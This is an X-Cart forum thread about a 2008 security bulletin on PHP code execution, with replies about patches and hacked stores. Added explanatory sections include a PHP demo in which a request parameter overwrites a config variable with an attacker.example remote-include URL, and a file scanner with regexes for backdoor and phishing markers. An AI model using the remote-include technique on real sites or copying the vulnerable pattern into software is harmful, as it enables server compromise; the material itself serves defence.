#1
Security bulletin 2008-25-12
Dear X-Cart customer,

During internal audit activities several moderate security issues have been detected in X-Cart. The issues make the software potentially vulnerable to attackers who wish to gain access to the application back-end. The solution is to apply the update released by Qualiteam.

SEVERITY: Moderate

IMPACT: A malicious user can redeclare used variables, execute his own PHP code and, as a result, gain access to the application back-end, store database and server file system.

AFFECTED VERSIONS: All X-Cart versions from 4.0.0 to 4.1.11

SOLUTION: We strongly recommend that X-Cart users install the security fix available in the HelpDesk 'File Area'. The following security improvements are included in the patch:
- protection from unauthorized access to the back-end, store database and server file system using GET or POST queries (formed in a special way) has been added.
- an extra protection level against SQL injections has been added.

Where to download the patch: please check your File Area:
* For X-Cart 4.1.11: check folders X-Cart -> X-Cart 4.1.11 (current version) -> Updates and patches
* For X-Cart 4.0.0 - 4.1.10: check folders X-Cart -> X-Cart supporting files for prev versions -> {Your X-Cart branch} -> {Your X-Cart version} -> Updates and patches

Installation instructions can be found in the README.txt file attached to the .tgz archive.

NOTE: If you are using X-Cart versions 4.1.0 - 4.1.11, please ensure you have installed all the previous security fixes *prior to* applying this new patch.

If you have any questions or concerns, feel free to contact our support team via your Helpdesk.

X-Cart Team & Qualiteam Tech Support department
__________________
Eugene Kaznacheev, Evangelist/Product Manager at Ecwid: http://www.ecwid.com/ (since Sept 2009) ex-Head of X-Cart Tech Support Department ex- X-Cart Hosting Manager - X-Cart hosting ex-X-Cart Technical Support Engineer Note: For the official guaranteed tech support services please turn to the Customers HelpDesk.
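The bulletin says only that a specially formed GET or POST request lets an attacker "redeclare used variables" and run PHP of his own; it does not publish the affected lines. The script below is an added illustration, not X-Cart's or Qualiteam's code, of the generic PHP pattern that wording describes: request parameters imported as globals after configuration has run, so a configuration variable that later feeds an include can be replaced from the URL. Every name in it ($xcart_dir, $module, both functions) is invented for the example, and the request is constructed by hand because CLI PHP starts with an empty $_GET.

```php
<?php
// Added illustration, not X-Cart's code: the bulletin does not publish the
// affected lines, so this reconstructs the generic PHP pattern its wording
// describes ("redeclare used variables, execute his own php code") next to a
// hardened form. All names ($xcart_dir, $module, both functions) are invented.

// 1. Configuration sets a trusted variable that later feeds an include.
$xcart_dir = '/var/www/html/xcart';
$module    = 'default';

// 2. Constructed request standing in for
//    ?xcart_dir=http://attacker.example/x.txt%3f&module=cart
$_GET = array('xcart_dir' => 'http://attacker.example/x.txt?', 'module' => 'cart');

// --- Vulnerable: register_globals emulation executed AFTER configuration ----
function import_request_globals_unsafe()
{
    // Same effect as register_globals=On or extract($_REQUEST): every request
    // parameter becomes, or silently replaces, a global of the same name.
    foreach (array_merge($_COOKIE, $_POST, $_GET) as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// --- Hardened: request data never becomes a variable name -------------------
function read_request(array $allowed)
{
    // Only listed parameters are read, into a dedicated array; configuration
    // globals such as $xcart_dir cannot be reached from the request at all.
    $src = array_merge($_COOKIE, $_POST, $_GET);
    $out = array();
    foreach ($allowed as $name) {
        if (array_key_exists($name, $src) && is_string($src[$name])) {
            $out[$name] = $src[$name];
        }
    }
    return $out;
}

// 3. The include path. basename() keeps $module from escaping the directory
//    but does nothing for $dir, which is why clobbering $xcart_dir is fatal.
//    The path is only printed, never included, so this script is safe to run.
function module_path($dir, $module)
{
    return $dir . '/modules/' . basename($module) . '.php';
}

// Vulnerable flow: the configuration variable now carries the attacker's URL.
import_request_globals_unsafe();
echo "unsafe: would include " . module_path($xcart_dir, $module) . "\n";

// Hardened flow: reset the config, then read only what this page expects.
$xcart_dir = '/var/www/html/xcart';
$req    = read_request(array('module', 'page'));
$module = isset($req['module']) ? $req['module'] : 'default';
echo "safe:   would include " . module_path($xcart_dir, $module) . "\n";
```

In the vulnerable flow the printed include path starts with the attacker's URL, and the trailing "?" turns the rest of the path into a query string, so PHP would fetch and execute the remote file wherever URL includes are enabled (allow_url_fopen before PHP 5.2; from 5.2 onward also allow_url_include, which defaults to Off). The hardened flow leaves $xcart_dir untouched because nothing in the request can name a variable. The actual change shipped in the patch is not described in the bulletin beyond the two bullet points above.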
#2
Re: Security bulletin 2008-25-12
Wow... Well thanks for posting these patches so quickly!
__________________
Carl Tice X-Cart 4.6.6 X-Payments 3.0 ReBOOT 3.4.1 PHP 5.6.30 MySQL 5.6.35 Linux 2.6.32-042stab120.18 ionCube PHP Loader v4.7.3 Perl 5.10.1
#3
Re: Security bulletin 2008-25-12
Yay, Merry Christmas :P
__________________
Emerson █ Total Server Solutions LLC- Quality X-Cart Hosting █ Recommended X-Cart Hosting Provider - US and UK servers █ Does your host backup your site? We do EVERY HOUR!!! █ Shared Hosting | Managed Cloud | Dedicated Servers
#4
Re: Security bulletin 2008-25-12
Ene,
Is this patch a revision of patch 2008-18-12? Seems all the same files are being patched on both.
__________________
Emerson █ Total Server Solutions LLC- Quality X-Cart Hosting █ Recommended X-Cart Hosting Provider - US and UK servers █ Does your host backup your site? We do EVERY HOUR!!! █ Shared Hosting | Managed Cloud | Dedicated Servers
#5
Re: Security bulletin 2008-25-12
Looking at 4.0.19, it patches register.php like the previous security patches but not any of the same lines, so it can be applied independently (not sure why you would want to do that). It does mean you can't use the overwrite version if you have applied the prior security patches - use the diffs.
__________________
Manuka Bay Company X-Cart Version 4.0.19 [Linux] UGG Boots and other fine sheepskin products http://www.snowriver.com
#6
Re: Security bulletin 2008-25-12
No. It is a different patch.
__________________
Eugene Kaznacheev, Evangelist/Product Manager at Ecwid: http://www.ecwid.com/ (since Sept 2009) ex-Head of X-Cart Tech Support Department ex- X-Cart Hosting Manager - X-Cart hosting ex-X-Cart Technical Support Engineer Note: For the official guaranteed tech support services please turn to the Customers HelpDesk.
#7
Re: Security bulletin 2008-25-12
I reported this vulnerability on the 21st when I found that someone had somehow installed a couple of fake Bank of America login pages on my server. I would strongly suggest that all users check their file system just to be safe.
The pages were loaded to my /payment/ directory on my server. Also, if you don't need it, "allow_url_fopen" in your php.ini should be off, as that will stop them from running the scripts from other servers.
__________________
Version 4.1.11
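The post above recommends checking the file system for planted pages but gives no procedure. The script below is an added example, not X-Cart's code, of a read-only CLI sweep of a store's web root that flags the things a post-compromise check usually starts with: files changed recently, PHP files sitting in upload or image directories, and files whose content matches phishing text, forms that post off-site, obfuscated eval-style backdoors, or includes of remote URLs. The default root (/var/www/html/xcart), the 7-day window, the directory list and every pattern are assumptions for a typical X-Cart 4 layout and should be tuned to the install.

```php
<?php
// Added example, not X-Cart's code: a read-only sweep of a store's web root
// for planted files such as the fake login pages described above.
// Run from a shell as:  php find_planted_files.php /var/www/html/xcart 7
// Root, time window, directory list and content patterns are assumptions.

// Content markers: phishing-page strings and common PHP backdoor idioms.
$markers = array(
    'phishing text'   => '/Bank of America|Online Banking|Verify your account/i',
    'offsite form'    => '/<form[^>]+action\s*=\s*["\']?https?:\/\//i',
    'obfuscated eval' => '/\b(eval|assert|passthru|shell_exec|system)\s*\(\s*(base64_decode|gzinflate|str_rot13|\$_(GET|POST|REQUEST|COOKIE))/i',
    'remote include'  => '/\b(include|require)(_once)?\s*\(?\s*["\']?https?:\/\//i',
);
// Top-level directories that hold uploads or static content and should never
// contain PHP. Smarty's templates_c legitimately holds compiled PHP, so it is
// deliberately not listed.
$no_php_dirs = array('images', 'files', 'upload', 'log');

function scan_tree($root, $days, array $markers, array $no_php_dirs)
{
    $cutoff   = time() - $days * 86400;
    $php_ext  = array('php', 'phtml', 'php5', 'inc');
    $text_ext = array_merge($php_ext, array('html', 'htm', 'tpl', 'js', 'txt'));
    $hits     = array();

    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if (!$file->isFile()) {
            continue;
        }
        $path    = $file->getPathname();
        $rel     = substr($path, strlen($root) + 1);
        $ext     = strtolower($file->getExtension());
        $topdir  = strpos($rel, '/') === false ? '' : strtok($rel, '/');
        $reasons = array();

        if ($file->getMTime() >= $cutoff) {
            $reasons[] = "modified in the last $days days";
        }
        if (in_array($ext, $php_ext, true) && in_array($topdir, $no_php_dirs, true)) {
            $reasons[] = "PHP file under $topdir/";
        }
        // Only read text-like files of modest size; binaries are skipped.
        if (in_array($ext, $text_ext, true) && $file->getSize() < 2 * 1024 * 1024) {
            $body = file_get_contents($path);
            foreach ($markers as $label => $re) {
                if (preg_match($re, $body)) {
                    $reasons[] = "content matches '$label'";
                }
            }
        }
        if ($reasons) {
            $hits[$rel] = $reasons;
        }
    }
    ksort($hits);
    return $hits;
}

$root = isset($argv[1]) ? rtrim($argv[1], '/') : '/var/www/html/xcart';
$days = isset($argv[2]) ? (int) $argv[2] : 7;

foreach (scan_tree($root, $days, $markers, $no_php_dirs) as $rel => $reasons) {
    printf("%s\n    %s\n", $rel, implode('; ', $reasons));
}
```

The output is a triage list, not a verdict: payment modules legitimately contain forms that post to gateway URLs, so 'offsite form' hits under payment/ need a look by hand, and after applying the security fix the 'modified' entries should be compared against the file list in the patch archive rather than treated as suspicious. On the php.ini point, allow_url_fopen = Off blocks the URL wrappers that fopen(), file_get_contents() and (before PHP 5.2) include() use; from PHP 5.2 onward a remote include additionally requires allow_url_include, which is Off by default, so both should be checked.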
#8
Re: Security bulletin 2008-25-12
There was only one file to update for version 4.1.10, prepare.php, so it was a pretty simple patch.
#9
Re: Security bulletin 2008-25-12
Just to clarify for everyone:
There are 2 patches, one from Dec 18th and a NEW one from the 25th. We installed the one from the 18th but not the one from the 25th, and we got hacked.
__________________
4.1.8 Xcart
#10
Re: Security bulletin 2008-25-12
We're seeing a few people who have not applied the secondary patches and are now having issues. The news of the latest exploit seems to have spread pretty quickly.
__________________
Conor Treacy - Big Red SEO - @bigredseo Search Engine Optimization & Internet Marketing - We Bring Your Website Out Of Hiding! If you can't be found on Google, Bing or Yahoo, you pretty much don't exist on the Internet. Omaha SEO Office with National & Local SEO Services Hourly Consulting - great for SEO Disaster Recovery, Audits and DIY Guidance
X-Cart forums © 2001-2020